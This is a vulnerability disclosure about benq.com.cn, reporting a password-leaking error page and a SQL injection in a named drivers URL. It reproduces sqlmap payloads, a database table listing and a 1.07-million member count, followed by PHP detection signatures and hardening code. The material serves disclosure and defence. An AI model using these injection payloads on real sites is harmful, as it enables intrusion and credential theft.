Website vulnerability collection of an electronic communication company + 1.07 million member password plaintext and Solution

Source: Internet
Author: User
Tags: sql injection prevention


Website address: www.benq.com.cn. Two vulnerabilities:


1. The password retrieval function leaks the password;

On the main site, click "Quick Logon" at the top, then "Remember password", enter the account number and verification code, and the next step leads to an error page that prints out the SQL statement, including the password in plaintext.


At this point I felt that the security awareness of this site was not high and that there might be other problems. Clicking around, I found the following SQL injection.


2. SQL injection on one page. Through sqlmap's SQL shell the following important information can be viewed:

Page URL: http://www.benq.com.cn/support/drivers?conf_name=monitor&prod_model=BL2201M, where the conf_name parameter is injectable.

A) The administrator account, password and other information can be viewed;

B) The records of the 1.07 million registered members, including the plaintext of their passwords, can be queried.

 

Problem 1: password retrieval vulnerability

1. Open the password retrieval page and enter the relevant information.

2. After clicking next, the error page appears; it displays both the MD5 and the plaintext of the password.

 

Problem 2: SQL injection

Step 1: Display the database name. It is in fact already visible on the error page above: benq.

sqlmap identified the following injection points with a total of 42 HTTP(s) requests:
---
Place: GET
Parameter: conf_name
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: conf_name=monitor' AND 9677=9677 AND 'JRvg'='JRvg&prod_model=BL2201M

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: conf_name=monitor' AND (SELECT 8378 FROM(SELECT COUNT(*),CONCAT(0x7167706971,(SELECT (CASE WHEN (8378=8378) THEN 1 ELSE 0 END)),0x71726e6871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kWDG'='kWDG&prod_model=BL2201M

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: conf_name=monitor' UNION ALL SELECT CONCAT(0x7167706971,0x6c726761534a59556d6c,0x71726e6871)#&prod_model=BL2201M

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: conf_name=monitor' AND SLEEP(5) AND 'Pnry'='Pnry&prod_model=BL2201M
---
web application technology: PHP 5.4.23
back-end DBMS: MySQL 5.0
available databases [2]:
[*] benq
[*] information_schema



Step 2: List the table names. Two important tables, auth__user and member__users, should be the administrator table and the member table respectively.
 

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: conf_name
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: conf_name=monitor' AND 9677=9677 AND 'JRvg'='JRvg&prod_model=BL2201M

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: conf_name=monitor' AND (SELECT 8378 FROM(SELECT COUNT(*),CONCAT(0x7167706971,(SELECT (CASE WHEN (8378=8378) THEN 1 ELSE 0 END)),0x71726e6871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kWDG'='kWDG&prod_model=BL2201M

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: conf_name=monitor' UNION ALL SELECT CONCAT(0x7167706971,0x6c726761534a59556d6c,0x71726e6871)#&prod_model=BL2201M

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: conf_name=monitor' AND SLEEP(5) AND 'Pnry'='Pnry&prod_model=BL2201M
---
web application technology: PHP 5.4.23
back-end DBMS: MySQL 5.0
Database: benq
[89 tables]
+----------------------------+
| auth__log                  |
| auth__operates             |
| auth__user                 |
| benq__cms_follow_bak       |
| benq__cms_footer_bak       |
| benq__cms_menu_bak         |
| benq__conf                 |
| benq__conf_section         |
| benq__names                |
| benq__names_bak            |
| benq__prod                 |
| benq__prod_3dgls           |
| benq__prod_benjoy          |
| benq__prod_box             |
| benq__prod_class           |
| benq__prod_conf            |
| benq__prod_conf_search     |
| benq__prod_conf_search_bak |
| benq__prod_diy             |
| benq__prod_dsc             |
| benq__prod_dsk             |
| benq__prod_earphone        |
| benq__prod_figure          |
| benq__prod_gaopaiyi        |
| benq__prod_ifp             |
| benq__prod_images          |
| benq__prod_kbd             |
| benq__prod_kmcombo         |
| benq__prod_lcd             |
| benq__prod_lfd             |
| benq__prod_mopo            |
| benq__prod_mouse           |
| benq__prod_pc              |
| benq__prod_printer         |
| benq__prod_prj             |
| benq__prod_scanner         |
| benq__prod_search          |
| benq__prod_subclass        |
| benq__prod_tag             |
| benq__tags                 |
| benq__tags_assoc           |
| cms__alt                   |
| cms__anchor                |
| cms__article               |
| cms__associate             |
| cms__category              |
| cms__driver                |
| cms__driver_include        |
| cms__email                 |
| cms__event                 |
| cms__follow                |
| cms__footer                |
| cms__indivi_seo            |
| cms__indivi_seo_bak        |
| cms__info                  |
| cms__info_bak              |
| cms__info_include          |
| cms__menu                  |
| cms__page                  |
| cms__page_section          |
| cms__pic                   |
| cms__pic_rule              |
| cms__pic_size              |
| cms__pic_tag               |
| cms__resource              |
| cms__resource_content      |
| cms__resource_html         |
| cms__section_associate     |
| cms__section_layout        |
| cms__section_link          |
| cms__section_template      |
| cms__service_center        |
| cms__service_center_assoc  |
| cms__template              |
| image_move_temp            |
| member__bind               |
| member__prod_reg           |
| member__profile            |
| member__recommend          |
| member__users              |
| mobi__article              |
| mobi__article_category     |
| mobi__buyapply             |
| mobi__info                 |
| mobi__layout               |
| mobi__page                 |
| mobi__resource             |
| mobi__search               |
| mobi__seo                  |
+----------------------------+




Step 3: The contents of the administrator table are skipped here. Since the password retrieval vulnerability showed a member's password in plaintext, the database presumably stores passwords in plaintext. This roughly confirmed my conjecture: looking at the data of member__users in the table below, the last column is the plaintext of the password.

Finally, a look at the total number of members: more than 1.07 million.
 

web application technology: PHP 5.4.23
back-end DBMS: MySQL 5.0
select count(*) from member__users;:    '1075524'
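The four techniques sqlmap reports above (boolean-based, error-based, UNION and time-based) leave recognisable traces in the web server's access log. The script below is an added detection example, not code from the report or from the site; it parses nginx "combined" log lines and flags the query strings that carry those patterns. The log lines are constructed for this example (addresses from the documentation ranges, URL-encoded forms of the payloads shown in the sqlmap output, shortened in the error-based case), and the log format and the drivers URL are assumptions taken from the report.

```php
<?php
// Added detection example; not part of the original report or the site's code.
// Scans access-log lines for the four injection techniques sqlmap reported
// against the conf_name parameter. Log lines below are constructed
// (nginx "combined" format, URL-encoded payloads) for the example.

declare(strict_types=1);

// Technique name => regex applied to the URL-decoded query string.
const SQLI_SIGNATURES = [
    'boolean-based' => '/[\'"]\s*(AND|OR)\s+\d+\s*=\s*\d+/i',
    'time-based'    => '/\b(SLEEP|BENCHMARK)\s*\(/i',
    'union-based'   => '/\bUNION\s+(ALL\s+)?SELECT\b/i',
    'error-based'   => '/\bINFORMATION_SCHEMA\b|\bFLOOR\s*\(\s*RAND\s*\(/i',
];

// Parse one nginx combined-format line; null when the line does not match.
function parseAccessLine(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \d+/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
            'uri' => $m[4], 'status' => (int) $m[5]];
}

// Names of the signatures that match the request's query string.
function classifyUri(string $uri): array
{
    $query = (string) parse_url($uri, PHP_URL_QUERY);
    // Decode twice so a double-encoded payload cannot slip past the patterns.
    $decoded = rawurldecode(rawurldecode($query));
    $hits = [];
    foreach (SQLI_SIGNATURES as $name => $regex) {
        if (preg_match($regex, $decoded) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// One alert per matching line: source address, matched techniques, request URI.
function scanLog(array $lines): array
{
    $alerts = [];
    foreach ($lines as $line) {
        $entry = parseAccessLine($line);
        if ($entry === null) {
            continue;
        }
        $hits = classifyUri($entry['uri']);
        if ($hits !== []) {
            $alerts[] = ['ip' => $entry['ip'], 'time' => $entry['time'],
                         'techniques' => $hits, 'uri' => $entry['uri']];
        }
    }
    return $alerts;
}

// Constructed sample: one benign request, then the four payloads from the report.
$sample = [
    '203.0.113.5 - - [20/Jan/2014:10:00:00 +0800] "GET /support/drivers?conf_name=monitor&prod_model=BL2201M HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [20/Jan/2014:10:00:01 +0800] "GET /support/drivers?conf_name=monitor%27%20AND%209677%3D9677%20AND%20%27JRvg%27%3D%27JRvg&prod_model=BL2201M HTTP/1.1" 200 5120 "-" "sqlmap/1.0"',
    '198.51.100.7 - - [20/Jan/2014:10:00:02 +0800] "GET /support/drivers?conf_name=monitor%27%20AND%20SLEEP(5)%20AND%20%27Pnry%27%3D%27Pnry&prod_model=BL2201M HTTP/1.1" 200 5120 "-" "sqlmap/1.0"',
    '198.51.100.7 - - [20/Jan/2014:10:00:03 +0800] "GET /support/drivers?conf_name=monitor%27%20UNION%20ALL%20SELECT%20CONCAT(0x7167706971,0x6c726761534a59556d6c,0x71726e6871)%23&prod_model=BL2201M HTTP/1.1" 200 5120 "-" "sqlmap/1.0"',
    '198.51.100.7 - - [20/Jan/2014:10:00:04 +0800] "GET /support/drivers?conf_name=monitor%27%20AND%20(SELECT%20COUNT(*),FLOOR(RAND(0)*2)x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)%20AND%20%27kWDG%27%3D%27kWDG&prod_model=BL2201M HTTP/1.1" 500 1024 "-" "sqlmap/1.0"',
];

// Usage: php sqli_log_scan.php [access.log]; without an argument the sample is used.
$lines = $argc > 1 ? file($argv[1], FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) : $sample;
foreach (scanLog($lines) as $alert) {
    printf("%-14s %-28s %-14s %s\n", $alert['ip'], $alert['time'],
           implode(',', $alert['techniques']), $alert['uri']);
}
```

The benign first line produces no alert; each of the four payload lines is attributed to exactly one technique. A 500 status on a request that also matches error-based or UNION patterns, as in the last sample line, is the strongest single signal that the injection actually reached the database, so it is worth alerting on at a higher severity than the pattern match alone.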

The data viewed during the test was deleted after the report was submitted to WooYun (乌云, "Dark Clouds").

Solution:

1. Fix the password retrieval function and redirect the error page;

2. SQL injection prevention: nginx or similar front-end filtering can be used; the modification workload is small and the effect is good.

To the vendor (BenQ): please send a gift, preferably a BenQ product. I am your loyal customer.
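Front-end filtering in nginx is quick to deploy, but it only hides the two findings; it does not remove them, and the error page that echoes the SQL statement and the plaintext column in member__users stay in place behind the filter. The code below is an added example, not the report's or the site's own code: it reconstructs the injection pattern the report describes as a minimal PHP/PDO query, places the hardened query beside it, and shows the storage and error-handling changes that make a password unrecoverable even when a query leaks. It assumes PHP 7.4 or newer with the pdo_sqlite extension for the self-contained demo; the table and column names are assumptions, not the site's real schema.

```php
<?php
// Added example, not code from the report or from the site: the two defects found
// above reconstructed as a minimal PHP/PDO pattern, each beside a hardened form.
// Assumes PHP 7.4+ with the pdo_sqlite extension for the self-contained demo;
// table and column names are assumptions, not the site's real schema.

declare(strict_types=1);

// Finding 2 as the report describes it: conf_name is spliced into the query text.
function lookupDriversVulnerable(PDO $db, string $confName, string $prodModel): array
{
    // A quote inside $confName closes the literal; the remainder is parsed as SQL.
    $sql = "SELECT file, version FROM cms__driver "
         . "WHERE conf_name = '$confName' AND prod_model = '$prodModel'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the SQL text is constant; values travel as bound parameters and
// cannot change the statement's structure, whatever characters they contain.
function lookupDrivers(PDO $db, string $confName, string $prodModel): array
{
    $stmt = $db->prepare('SELECT file, version FROM cms__driver WHERE conf_name = ? AND prod_model = ?');
    $stmt->execute([$confName, $prodModel]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Finding 1: the error page printed the SQL statement and the plaintext password.
// Hardened: database errors are logged server-side and the response stays generic.
function runSafely(callable $fn)
{
    try {
        return $fn();
    } catch (PDOException $e) {
        error_log('database error: ' . $e->getMessage()); // server log only
        return null; // caller renders a generic error page: no query, no data
    }
}

// Passwords are stored as salted hashes; there is nothing left to "retrieve".
function storePassword(PDO $db, string $user, string $password): void
{
    $stmt = $db->prepare('UPDATE member__users SET password = ? WHERE username = ?');
    $stmt->execute([password_hash($password, PASSWORD_DEFAULT), $user]);
}

function checkLogin(PDO $db, string $user, string $password): bool
{
    static $dummyHash = null;
    $dummyHash = $dummyHash ?? password_hash('placeholder', PASSWORD_DEFAULT);
    $stmt = $db->prepare('SELECT password FROM member__users WHERE username = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Verify against a dummy hash when the user is absent, so response time
    // does not reveal which usernames exist.
    $ok = password_verify($password, $row['password'] ?? $dummyHash);
    return $row !== false && $ok;
}

// Password retrieval becomes a reset: a random single-use token is e-mailed and
// only its hash is stored, so neither the old password nor the token can be
// read out of the database.
function issueResetToken(PDO $db, string $user): string
{
    $token   = bin2hex(random_bytes(32));
    $expires = (new DateTimeImmutable('+30 minutes'))->format('Y-m-d H:i:s');
    $stmt = $db->prepare('UPDATE member__users SET reset_token = ?, reset_expires = ? WHERE username = ?');
    $stmt->execute([hash('sha256', $token), $expires, $user]);
    return $token; // goes into the e-mail link, never into a page or a log
}

// Self-contained demo on in-memory SQLite with constructed data (no MySQL needed).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE cms__driver (conf_name TEXT, prod_model TEXT, file TEXT, version TEXT)');
$db->exec('CREATE TABLE member__users (username TEXT, password TEXT, reset_token TEXT, reset_expires TEXT)');
$db->exec("INSERT INTO cms__driver VALUES ('monitor', 'BL2201M', 'bl2201m_driver.zip', '1.0')");
$db->exec("INSERT INTO member__users (username) VALUES ('alice')");
storePassword($db, 'alice', 'correct horse battery');

// The time-based payload from the sqlmap output, used here only as test input.
$payload = "monitor' AND SLEEP(5) AND 'Pnry'='Pnry";
var_dump(runSafely(fn() => lookupDriversVulnerable($db, $payload, 'BL2201M')));
var_dump(runSafely(fn() => lookupDrivers($db, $payload, 'BL2201M')));
var_dump(lookupDrivers($db, 'monitor', 'BL2201M'));
var_dump(checkLogin($db, 'alice', 'correct horse battery'),
         checkLogin($db, 'alice', 'wrong'),
         checkLogin($db, 'nobody', 'anything'));
var_dump(strlen(issueResetToken($db, 'alice')));
```

Run with `php hardening.php`. In the vulnerable call the payload is parsed as SQL: on the site's MySQL it would pause the query for five seconds, on the SQLite demo it raises an exception because SLEEP is not a function there, and either way runSafely logs the detail and hands back nothing the page could print. The hardened call sends the same string as a bound parameter, which simply matches no row. The login checks succeed only for the right password, and the reset token is 64 hex characters of which only the SHA-256 hash is stored. Pair this with `display_errors = Off` in php.ini so that no PHP or database error can reach a response again, and keep the nginx filter the report proposes as an extra layer in front of the fixed code rather than as the fix itself.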
